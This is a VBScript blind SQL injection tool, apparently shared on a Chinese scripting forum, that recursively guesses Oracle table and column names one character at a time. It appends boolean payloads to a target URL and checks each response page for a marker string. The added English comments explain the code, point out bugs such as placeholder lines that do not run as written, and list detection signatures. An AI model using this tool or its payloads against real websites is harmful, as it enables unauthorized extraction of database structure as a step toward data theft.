vbs小铺

感谢marcos,人才呀,巧妙的递归;2010我懒了,以后再加猜字段值内容吧
' Script-level state shared by every procedure below (no Option Explicit; all
' names here are implicitly global).
' oracleXML: a single MSXML HTTP client reused for every probe request (see GetPage).
Set oracleXML = CreateObject("Microsoft.XMLHTTP")
' TargetURL: placeholder left by the author ("modify yourself"). As written this is
' not a valid VBScript statement, so the listing does not run in this form.
TargetURL = 自行修改
' RightWord: placeholder for a string that appears in the "true" response page; its
' presence (InStr > 0) is the only oracle the probes use. The trailing ’ is a
' typographic quote, not the VBScript comment character, so this line is also a
' syntax error as written.
RightWord = "正常页面字符串" ’自行修改


' Refuse to run under the GUI host: WScript.FullName is the host executable path,
' and its last 11 characters are compared case-insensitively against "wscript.exe".
' The Echo calls below are intended for a console (cscript.exe), not message boxes.
if (lcase(right(wscript.fullname,11))="wscript.exe") then
wscript.echo "Execute it under the cmd.exe Plz! Thx."
wscript.quit
end If

   ' The first command-line argument selects the mode ("biao" / "ziduan", see the
   ' Select Case below). When no arguments are given, action is left Empty and the
   ' dispatch falls through to usage.
   ' oArgs is script-level and is read again inside GetFileNameX as oArgs(1); that
   ' index only exists when a second argument (the table name) was supplied.
   Set oArgs = WScript.arguments
   if oArgs.count<>0 then
   action=trim(oArgs(0))
      End if

' Mode dispatch on the (trimmed) first argument. Comparison is case-sensitive here,
' so only the exact lower-case strings "biao" and "ziduan" select a mode; anything
' else, including no argument, prints usage.
select case action
case "biao"
   biaocrack
case "ziduan"
   Ziduancrack
case else
   usage
end Select

' Mode "biao": enumerate table names starting from an empty prefix and print the
' accumulated, newline-separated result that GetTableNameX returns. Has no return
' value of its own (the function name is never assigned).
Function Biaocrack()
WScript.Echo GetTableNameX("")
End Function

' Mode "ziduan": enumerate column names of the table named by the second command-line
' argument (read as oArgs(1) inside GetFileNameX) and print the accumulated result.
' Despite its name, GetFileNameX enumerates column names, not file names.
Function Ziduancrack()
WScript.Echo GetFileNameX("")
End Function

' Prints the (Chinese) usage text. Gist: edit the URL and the "correct page" string
' in the script; "biao" enumerates the current schema's table names; the column
' mode enumerates the columns of a given table.
' NOTE(review): the third line shows the table name as the first argument, but the
' Select Case above requires "ziduan" as argument 0 and reads the table name from
' argument 1 (see GetFileNameX), so the help text does not match the dispatch.
' The text also mentions removing a single quote from the SQL for numeric columns,
' yet no quote appears in the SQL fragments below.
Function usage()
WScript.Echo "请改动里的url和正确页面显示的字符串,默认猜字符型。如果数字型去掉sql语句里的第一个单引号"& vbNewLine
WScript.Echo "cscript this.vbs biao-------------------------------->是猜当前库所有的表名"&vbNewLine
WScript.Echo "cscript this.vbs 表名---------------------------->是猜给定表名里所有的字段名"&vbNewLine
End Function

' Recursive, boolean-based enumeration of Oracle table names (user_tables), one
' character at a time, starting from sPrefix (upper-cased). For each candidate
' character up to three probes are sent through GetPage; each appends a fragment of
' the form " and 0<>(select count(*) from user_tables where ...) and a=a" to
' TargetURL, and a probe counts as "true" when RightWord occurs in the response.
' Returns the discovered full names joined with vbNewLine; each is also echoed as
' "[-]: name", and a prefix that has longer continuations is echoed as "[+]: prefix".
'
' Detection notes (derived from the fragments below): every probe is a GET whose
' query string carries the literals "user_tables", "substr(table_name", "count(*)"
' and the fixed suffix "and a=a"; one prefix level issues up to 38 requests (one
' per entry of aChars, plus two more per hit), so both the suffix and the request
' volume are loggable signatures at the web tier. Server-side parameterised
' statements remove the boolean oracle this depends on.
Function GetTableNameX(sPrefix)

' Length of the known prefix; 0 selects the "first character" probe shape below.
iLen = Len(sPrefix)
sPrefix = UCase(sPrefix)
' Candidate alphabet: A-Z, 0-9, "_" and "-" (38 entries).
aChars = Array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "_","-")

' Loop variables are created without Dim; presumably procedure-local per VBScript's
' implicit-declaration rule, so the recursive call does not disturb this I — confirm.
For I = 0 To UBound(aChars)
   If(iLen = 0)Then
    SQL = " and 0<>(select count(*) from user_tables where substr(table_name,1,1)"
   Else
    ' Prefix and the position of the next character; values are concatenated unquoted.
    SQL = " and 0<>(select count(*) from user_tables where substr(table_name,1," & iLen & ")=" & sPrefix & " AND substr(table_name," & (iLen + 1) & ",1)"
   End If

   ' Probe 1: does any table name continue the prefix with aChars(I)?
   sSQL = SQL & "=" & aChars(I) & ") and a=a"
   sHTML = GetPage(TargetURL & sSQL)
   ' InStr returns 0 when RightWord is absent (the "false" outcome).
   iPos = InStr(sHTML, RightWord)

   If(iPos > 0)Then
    ' Probe 2: is prefix + aChars(I) a complete table name?
    sSQL=" and 0<>(select count(*) from user_tables where table_name=" & sPrefix & aChars(I) & ") and a=a"
    sHTML = GetPage(TargetURL & sSQL)
    iPos = InStr(sHTML, RightWord)

    If(iPos > 0)Then
     WScript.Echo "[-]: " & sPrefix & aChars(I)
     ' Reading the function name without parentheses yields the current return value.
     GetTableNameX = GetTableNameX & sPrefix & aChars(I) & vbNewLine
    End If

    ' Probe 3: is there a longer name sharing prefix + aChars(I)? If so, recurse.
    sSQL=" and 0<>(select count(*) from user_tables where substr(table_name,1," & (iLen + 1) & ")=" & sPrefix & aChars(I) & " AND length(table_name)>" & (iLen + 1) & ") and a=a"
    sHTML = GetPage(TargetURL & sSQL)
    iPos = InStr(sHTML, RightWord)
    If(iPos > 0)Then
     WScript.Echo "[+]: " & sPrefix & aChars(I)
     GetTableNameX = GetTableNameX & vbNewLine & GetTableNameX(sPrefix & aChars(I))
    End If
   Else
    ' Progress output: the rejected candidate is echoed without a marker.
    WScript.Echo sPrefix & aChars(I)
   End If

Next

' Separator printed once per prefix level (so once per recursion frame).
WScript.Echo "=========================================="

End Function

' Recursive, boolean-based enumeration of column names (user_tab_columns) for the
' table named by the script-level oArgs(1), upper-cased. Structure and probe order
' are identical to GetTableNameX (probe 1: next character; probe 2: exact name;
' probe 3: longer continuation, then recurse); only the catalog view, the column
' being compared and the extra table_name predicate differ.
' Returns the discovered column names joined with vbNewLine.
' Differences from GetTableNameX worth knowing:
'  - each probe URL is echoed to stdout before it is sent (WSH.ECHO lines; WSH is
'    the host's alias for WScript), so the full target URL and payload end up in
'    the console/stdout of the machine running this script;
'  - oArgs(1) is read on every probe; with fewer than two arguments this raises a
'    subscript error on the first iteration.
' The function name is a misnomer: it enumerates columns, not files.
' Detection notes: query strings carry "user_tab_columns", "substr(column_name",
' "count(*)" and the fixed suffix "and a=a"; request volume per prefix level is the
' same as for GetTableNameX.
Function GetFileNameX(sPrefix)

iLen = Len(sPrefix)
sPrefix = UCase(sPrefix)
' Same 38-entry candidate alphabet as GetTableNameX.
aChars = Array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "_","-")

For I = 0 To UBound(aChars)
   If(iLen = 0)Then
    ' Table name comes from the second command-line argument, concatenated unquoted.
    SQL = " and 0<>(select count(*) from user_tab_columns where table_name="&UCase(oArgs(1))&" and substr(column_name,1,1)"
   
   Else
    SQL = " and 0<>(select count(*) from user_tab_columns where table_name="&UCase(oArgs(1))&" and substr(column_name,1," & iLen & ")=" & sPrefix & " AND substr(column_name," & (iLen + 1) & ",1)"
   End If

   ' Probe 1: does any column name continue the prefix with aChars(I)?
   sSQL = SQL & "=" & aChars(I) & ") and a=a"
   WSH.ECHO TargetURL & sSQL
   sHTML = GetPage(TargetURL & sSQL)
   iPos = InStr(sHTML, RightWord)

   If(iPos > 0)Then
    ' Probe 2: is prefix + aChars(I) a complete column name?
    sSQL=" and 0<>(select count(*) from user_tab_columns where table_name="&UCase(oArgs(1))&" and column_name=" & sPrefix & aChars(I) & ") and a=a"
    WSH.ECHO TargetURL & sSQL
    sHTML = GetPage(TargetURL & sSQL)
    iPos = InStr(sHTML, RightWord)

    If(iPos > 0)Then
     WScript.Echo "[-]: " & sPrefix & aChars(I)
     GetFileNameX = GetFileNameX & sPrefix & aChars(I) & vbNewLine
    End If

    ' Probe 3: is there a longer column name sharing prefix + aChars(I)? If so, recurse.
    sSQL=" and 0<>(select count(*) from user_tab_columns where table_name="&UCase(oArgs(1))&" and substr(column_name,1," & (iLen + 1) & ")=" & sPrefix & aChars(I) & " AND length(column_name)>" & (iLen + 1) & ") and a=a"
    WSH.ECHO TargetURL & sSQL
    sHTML = GetPage(TargetURL & sSQL)
    iPos = InStr(sHTML, RightWord)
    If(iPos > 0)Then
     WScript.Echo "[+]: " & sPrefix & aChars(I)
     GetFileNameX = GetFileNameX & vbNewLine & GetFileNameX(sPrefix & aChars(I))
    End If
   Else
    ' Progress output: the rejected candidate is echoed without a marker.
    WScript.Echo sPrefix & aChars(I)
   End If

Next

' Separator printed once per prefix level.
WScript.Echo "=========================================="

End Function
===========================================================

' Fetches sURL with a synchronous GET (async = False, empty user/password) on the
' shared oracleXML client and returns the response body decoded by BytesToBStr.
' No encoding is applied to sURL here, and the HTTP status is never checked: an
' error page or any other non-success response is returned as text just like a
' success page, so it reads as "false" whenever it lacks RightWord. The same object
' is reopened for every call; no timeout is set, so a stalled request blocks the
' whole enumeration.
Function GetPage(sURL)
oracleXML.Open "Get", sURL, False, "", ""
oracleXML.Send()
GetPage = BytesToBStr(oracleXML.ResponseBody)
End Function

============================================
函数名称:BytesToBStr
函数功能:将XMLHTTP对象中的内容转化为GB2312编码
============================================
' Converts the raw response bytes (XMLHTTP.ResponseBody) to a string by writing them
' into an ADODB.Stream as binary and reading them back as GB2312 text.
' Body: byte array from the HTTP client. Returns the decoded text.
' Only GB2312 is ever used, so RightWord matching assumes the target page is served
' in that encoding (or a compatible ASCII subset).
Function BytesToBStr(Body)
Dim oStream

Set oStream = CreateObject("ADODB.Stream")
' Type 1 = adTypeBinary, Mode 3 = adModeReadWrite.
oStream.Type = 1
oStream.Mode =3
oStream.Open
oStream.Write Body
' Rewind, then switch to text (Type 2 = adTypeText) with the fixed charset.
oStream.Position = 0
oStream.Type = 2
oStream.Charset = "GB2312"
' VBScript identifiers are case-insensitive, so this assigns the return value.
BytesToBstr = oStream.ReadText
oStream.Close
Set oStream = nothing
End Function